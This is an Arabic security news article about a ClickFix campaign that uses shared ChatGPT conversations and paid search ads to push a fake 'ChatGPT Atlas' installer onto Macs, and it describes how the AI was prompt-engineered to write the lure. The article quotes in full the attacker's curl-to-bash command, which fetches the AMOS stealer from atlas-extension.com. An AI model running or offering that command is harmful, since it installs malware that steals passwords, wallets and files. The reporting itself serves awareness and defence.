كشفت حملة إلكترونية جديدة عن استخدامها لطريقة مبتكرة لاستهداف مستخدمي نظام macOS، وذلك بالاستعانة بالموقع الرسمي لـ ChatGPT. تعتمد هذه الهجمة المتقدمة على نشر أدلة تثبيت وهمية على نطاق chatgpt.com، مستغلة ميزة مشاركة المحادثات في المنصة.
تستغل هذه الحملة، التي تم رصدها بواسطة باحثين أمنيين، ميزة مشاركة المحادثات في ChatGPT، حيث يمكن لأي مستخدم إنشاء محادثة عامة ومشاركتها عبر رابط يبدو وكأنه صادر عن OpenAI. هذا يسمح للمهاجمين بنشر محتوى خبيث يبدو شرعيًا.
هجمات ClickFix تستغل ChatGPT
تبدأ هذه الهجمة عبر إعلانات مدفوعة على محركات البحث، مثل جوجل. عندما يبحث المستخدمون عن عبارات مثل “ChatGPT Atlas”، تظهر لهم روابط دعائية تبدو وكأنها تقود مباشرة إلى الموقع الرسمي لـ ChatGPT. هذه التكتيكات تهدف إلى خداع المستخدمين وزيادة احتمالية نقرهم.
يحتوي الإعلان على عنوان “ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac”، مما يعزز من مصداقيته الظاهرية. بعد النقر على هذه الإعلانات، يتم توجيه المستخدمين إلى محادثة ChatGPT مشتركة تحتوي على تعليمات تثبيت مزيفة لمتصفح Atlas الذي لا وجود له.
في المقابل، يعمل المهاجمون على هندسة الأوامر (Prompt Engineering) لإجبار ChatGPT على إنشاء دليل تثبيت مقنع. بعد ذلك، يقومون بتنظيف سجل المحادثة من أي محتوى مشبوه قبل جعله متاحًا للعامة.
هذه المحادثات المشتركة تظهر عادةً تحت نطاق chatgpt.com/share/ الفرعي، مما قد يعطي انطباعًا للمستخدمين بأنها محتوى رسمي من OpenAI، على الرغم من أنها ليست كذلك. هذا الخداع البصري يلعب دورًا كبيرًا في نجاح الهجمة.
آلية العدوى
يقوم دليل التثبيت الوهمي بإرشاد المستخدمين لفتح تطبيق Terminal على أجهزة Mac الخاصة بهم وتشغيل أمر معين. يبدو هذا الأمر كالتالي:
/bin/bash -c “$(curl -fsSL ‘https://atlas-extension.com/gt’)”
هذا الأمر يقوم بتنزيل وتنفيذ نص برمجي خبيث من خادم يتحكم فيه المهاجمون. بعد التنفيذ، يطالب النص البرمجي بكلمة مرور النظام ويكرر الطلب حتى يتم إدخالها بشكل صحيح.
بمجرد الحصول على كلمة المرور، يقوم النص البرمجي بتنزيل برنامج سرقة المعلومات AMOS وتثبيته باستخدام بيانات الاعتماد المسروقة. هذه البرمجيات الخبيثة قادرة على سرقة كلمات المرور وملفات تعريف الارتباط وبيانات المتصفح الأخرى من متصفحات مثل Chrome وFirefox.
إضافة إلى ذلك، يستهدف AMOS معلومات المحافظ الرقمية مثل Electrum وCoinomi وExodus. كما يقوم بجمع ملفات بامتدادات TXT وPDF وDOCX من مجلدات مثل سطح المكتب والمستندات والتنزيلات.
يُذكر أن البرنامج الخبيث يقوم أيضًا بتثبيت باب خلفي (backdoor) يبدأ تلقائيًا عند تشغيل النظام، مما يمنح المهاجمين وصولاً مستمرًا عن بعد إلى النظام المصاب. هذا التطور يبرز أهمية التوعية الأمنية، خاصة فيما يتعلق بالتفاعلات مع المنصات الشهيرة.